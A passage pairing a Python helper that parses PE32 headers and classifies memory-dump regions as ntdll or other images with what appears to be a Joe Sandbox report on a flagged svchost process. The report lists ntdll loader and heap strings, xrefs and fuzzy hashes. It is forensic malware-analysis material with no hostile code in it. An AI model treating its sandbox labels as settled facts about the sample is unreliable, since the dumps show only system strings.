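    if e_lfanew + 24 > len(region) or region[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", region, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if opt_off + opt_size + 40 * nsect > len(region):
        return None
    if struct.unpack_from("<H", region, opt_off)[0] != 0x10B:  # PE32 only: the dump is from a 32-bit process
        return None
    image_base = struct.unpack_from("<I", region, opt_off + 28)[0]
    size_of_image = struct.unpack_from("<I", region, opt_off + 56)[0]
    sections = []
    for i in range(nsect):
        name, vsize, va = struct.unpack_from("<8sII", region, opt_off + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize))
    return {"machine": machine, "image_base": image_base,
            "size_of_image": size_of_image, "sections": sections}


def classify_region(region: bytes, dump_base: int) -> dict:
    """Label a dump 'ntdll image', 'pe image' or 'not a pe image'.
    Marker hits are reported as virtual addresses relative to dump_base."""
    hdr = parse_pe_headers(region)
    markers = {m.decode(): [dump_base + off for off in find_all(region, m)] for m in NTDLL_MARKERS}
    markers = {k: v for k, v in markers.items() if v}
    if hdr is None:
        verdict = "not a pe image"
    elif len(markers) >= 2:  # one string can sit in heap data; two or more distinct ones mean the code is here
        verdict = "ntdll image"
    else:
        verdict = "pe image"
    return {"pe": hdr, "markers": markers, "verdict": verdict,
            "header_base_matches_dump": bool(hdr) and hdr["image_base"] == dump_base}


def build_sample_image(image_base: int, payload: bytes) -> bytes:
    """Constructed PE32 image with one .text section at RVA 0x1000 (test input only)."""
    e_lfanew = 0x40
    opt = bytearray(0xE0)                                   # PE32 optional header is 224 bytes
    struct.pack_into("<H", opt, 0, 0x10B)                   # Magic: PE32
    struct.pack_into("<I", opt, 28, image_base)             # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)                 # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                  # FileAlignment
    struct.pack_into("<I", opt, 56, 0x1000 + len(payload))  # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x400)                  # SizeOfHeaders
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)  # i386, 1 section, DLL
    section = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x1000,
                          len(payload), 0x1000, 0, 0, 0, 0, 0x60000020)
    image = bytearray(0x1000)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    image[e_lfanew + 4:e_lfanew + 24] = coff
    image[e_lfanew + 24:e_lfanew + 24 + len(opt)] = opt
    sec_off = e_lfanew + 24 + len(opt)
    image[sec_off:sec_off + 40] = section
    return bytes(image) + payload


# Constructed inputs: a PE32 holding three markers at RVA 0x1000 (stands in for the 0x03C00000
# dump; header base 0x77000000 is made up), a PE32 without markers, and a bare heap chunk.
NTDLL_LIKE_REGION = build_sample_image(
    0x77000000, b"\0" * 16 + b"minkernel\\ntdll\\ldrinit.c\0"
    + b"LdrpInitializeExecutionOptions\0" + b"LdrpGetShimEngineInterface\0")
PLAIN_PE_REGION = build_sample_image(0x00400000, b"\0" * 32)
HEAP_CHUNK = b"\0" * 64 + b"minkernel\\ntdll\\ldrinit.c\0" + b"\0" * 64

if __name__ == "__main__":
    for name, region, base in (("ntdll-like", NTDLL_LIKE_REGION, 0x03C00000),
                               ("plain pe", PLAIN_PE_REGION, 0x00400000),
                               ("heap chunk", HEAP_CHUNK, 0x00A00000)):
        r = classify_region(region, base)
        print(f"{name:>10}: {r['verdict']}, markers at "
              f"{[hex(a) for v in r['markers'].values() for a in v]}")
```

On a real dump, call classify_region(open(path, "rb").read(), 0x03C00000) with the base from the report's Source File name. The header ImageBase is returned next to header_base_matches_dump so it can be compared with the address the region was dumped from; a PE without the marker strings is reported only as "pe image", and a single string inside non-PE data stays "not a pe image".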
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-3089669407
• Opcode ID: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
• Instruction ID: d588cd32f61ebcebc7f05e536a58118ac9464702c7f9479a09029d78cee04501
• Opcode Fuzzy Hash: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
• Instruction Fuzzy Hash: 878102B7D012186F8B61FBA9EDD4EEEB7BDAB15610B054421B910FB114E730EE149BA0
Strings
• 8, xrefs: 03CA52E3
• Thread is in a state in which it cannot own a critical section, xrefs: 03CA5543
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA54E2
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA540A, 03CA5496, 03CA5519
• Address of the debug info found in the active list., xrefs: 03CA54AE, 03CA54FA
• Critical section debug info address, xrefs: 03CA541F, 03CA552E
• Invalid debug info address of this critical section, xrefs: 03CA54B6
• undeleted critical section in freed memory, xrefs: 03CA542B
• Critical section address., xrefs: 03CA5502
• double initialized or corrupted critical section, xrefs: 03CA5508
• Critical section address, xrefs: 03CA5425, 03CA54BC, 03CA5534
• corrupted critical section, xrefs: 03CA54C2
• Thread identifier, xrefs: 03CA553A
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA54CE
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: 1612f316f5d6c5ca7b8da948fbab3d4a7a6b2d06a003f33d730e9fc0e128b216
• Instruction ID: 456954ea4f0dd25a3cbfbfd52409b9d8384888699ab45794b852c49c2c047e6f
• Opcode Fuzzy Hash: 1612f316f5d6c5ca7b8da948fbab3d4a7a6b2d06a003f33d730e9fc0e128b216
• Instruction Fuzzy Hash: 5481D0B1A00759EFDB60CF99C844BAEBBB9FB0A704F548169F514FB241D371A940EB60
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
• API String ID: 0-360209818
• Opcode ID: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
• Instruction ID: f0a406c1a77317f2a9fa110da154a49533f6ec074b94398c4abf49b7417cf60d
• Opcode Fuzzy Hash: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
• Instruction Fuzzy Hash: 40629EB5E0062A8FDB24CF19C8817A9B7B6EF95324F5D82DAD449EB240D7325AD1CF40
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
• API String ID: 0-3591852110
• Opcode ID: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
• Instruction ID: 9d7dce24789fb40ff977518bff5a74f094d714bea92837fdc4a33fbe62415a4c
• Opcode Fuzzy Hash: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
• Instruction Fuzzy Hash: 1712C9756046829FC725DF29C440BBABBF5EF09704F0D8459E496CF682D738E9A0DB50
Strings
• String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
Strings
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
Strings
• String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
Strings
• String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
Strings
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
Strings
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03C2D2C3
• Control Panel\Desktop\LanguageConfiguration, xrefs: 03C2D196
• @, xrefs: 03C2D2AF
• @, xrefs: 03C2D0FD
• @, xrefs: 03C2D313
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03C2D0CF
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03C2D146
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03C2D262
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
Strings
• !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03C97709
• @, xrefs: 03C49EE7
• Internal error check failed, xrefs: 03C97718, 03C978A9
• sxsisol_SearchActCtxForDllName, xrefs: 03C976DD
• minkernel\ntdll\sxsisol.cpp, xrefs: 03C97713, 03C978A4
• Status != STATUS_NOT_FOUND, xrefs: 03C9789A
• [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03C976EE
• String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
Strings
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
Strings
• String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
Strings
• String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
Strings
• String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
Strings
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 03CA8181, 03CA81F5
• Loading import redirection DLL: '%wZ', xrefs: 03CA8170
• LdrpInitializeProcess, xrefs: 03C6C6C4
• Unable to build import redirection Table, Status = 0x%x, xrefs: 03CA81E5
• LdrpInitializeImportRedirection, xrefs: 03CA8177, 03CA81EB
• minkernel\ntdll\ldrinit.c, xrefs: 03C6C6C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                  • API String ID: 0-475462383
                                                                                                                  Strings
                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03CA219F
                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 03CA2160, 03CA219A, 03CA21BA
                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03CA21BF
                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 03CA2165
                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03CA2178
                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03CA2180
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                  • API String ID: 0-861424205
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                  • API String ID: 0-3127649145
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                  • API String ID: 0-3393094623
                                                                                                                  Strings
                                                                                                                  • WindowsExcludedProcs, xrefs: 03C5522A
                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 03C5542B
                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 03C55352
                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 03C5527B
                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 03C55247
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                  • API String ID: 0-258546922
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                  • API String ID: 0-2518169356
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: S-$V~il$gfff$n$sHM
                                                                                                                  • API String ID: 0-1673249879
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-1975516107
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                  • API String ID: 0-3061284088
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3570731704
                                                                                                                  Strings
                                                                                                                  • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03C97D56
                                                                                                                  • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03C97D03
                                                                                                                  • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03C97D39
                                                                                                                  • SsHd, xrefs: 03C4A885
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                  • API String ID: 0-2905229100
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                  • API String ID: 0-379654539
                                                                                                                  • Opcode ID: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                                                                                  • Instruction ID: 8a01517463ba27e19304a8470170bb1423d67f8b7f67b32422c087714acd8aad
                                                                                                                  • Opcode Fuzzy Hash: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                                                                                  • Instruction Fuzzy Hash: A5C187791083869FDB11DF19C044B6AB7F4BF8A704F04886AF8D6CB250E735CA59CB92
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C954E0, 03C955A1
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C954D1, 03C95592
                                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03C954ED
                                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03C955AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                  • API String ID: 0-1657114761
                                                                                                                  • Opcode ID: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                                                                                                  • Instruction ID: 076e8c470aff0b65029a658a9df4aa2a925a25cbc75631ca56e5e76a89266ff1
                                                                                                                  • Opcode Fuzzy Hash: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                                                                                                  • Instruction Fuzzy Hash: 82A1FE74644265DFDB24DF29C840BBAFBB1BF45300F188569D59ACB282D330A948DB91
                                                                                                                  Strings
                                                                                                                  • .Local, xrefs: 03C628D8
                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03CA22B6
                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 03CA21DE
                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03CA21D9, 03CA22B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                  • API String ID: 0-1239276146
                                                                                                                  • Opcode ID: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                                                                                  • Instruction ID: b2826c32c868836ce46a7b669e1b236e9d08e5134f462f307af6c926902610be
                                                                                                                  • Opcode Fuzzy Hash: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                                                                                  • Instruction Fuzzy Hash: CDA1903590022A9FDB24CF65CC84BA9B3B5BF58314F1949E9D948EB251D730AE81CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                  • API String ID: 0-2586055223
                                                                                                                  • Opcode ID: e19f653f5be8967c6b5c435ce1777d866bddc06ab430b7b70bc4397821d8b153
                                                                                                                  • Instruction ID: fd342ce0c09ecdf1bb2acd97fd02a8919fecc3bbaa67bc0ff6dd3f769c0aebd0
                                                                                                                  • Opcode Fuzzy Hash: e19f653f5be8967c6b5c435ce1777d866bddc06ab430b7b70bc4397821d8b153
                                                                                                                  • Instruction Fuzzy Hash: D26103762047849FD721EB68C844F6BBBF8EF80714F090468E955CF291D734EA41DB61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                  • API String ID: 0-336120773
                                                                                                                  • Opcode ID: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                                                                                  • Instruction ID: 5f1bbe40d429d0cc9680e065787f1b3402d42bdfec66d537ad980fdef6b338d1
                                                                                                                  • Opcode Fuzzy Hash: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                                                                                  • Instruction Fuzzy Hash: F031DA76200260EFC751EB99CC86F6AB7E8EF09724F1D0055E411CF291E670FD50DA65
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                  • API String ID: 0-1391187441
